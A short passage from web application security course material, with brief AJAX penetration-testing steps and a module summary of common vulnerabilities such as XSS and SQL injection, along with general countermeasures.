Observe HTML and JavaScript files to find URLs of additional application surface exposure
Use proxies and sniffers to observe traffic generated by user-viewable pages and the background asynchronous traffic to the AJAX endpoints in order to determine the format and destination of the requests
AJAX Testing
The following are the steps used to carry out AJAX pen testing:
Module Summary
Organizations today rely heavily on web applications and Web 2.0 technologies to support key business processes and improve performance. With increasing dependence, web applications and web services are increasingly being targeted by various attacks that result in huge revenue loss for the organizations.
Some of the major web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security misconfiguration, broken session management, etc.
Input validation flaws are a major concern as attackers can exploit these flaws to perform or create a base for most web application attacks, including cross-site scripting, buffer overflow, injection attacks, etc.
It is also observed that most vulnerabilities result from misconfiguration and not following standard security practices.
Common countermeasures for web application security include secure application development, input validation, creating and following security best practices, using a WAF/firewall/IDS, and performing regular auditing of the network using web application security tools.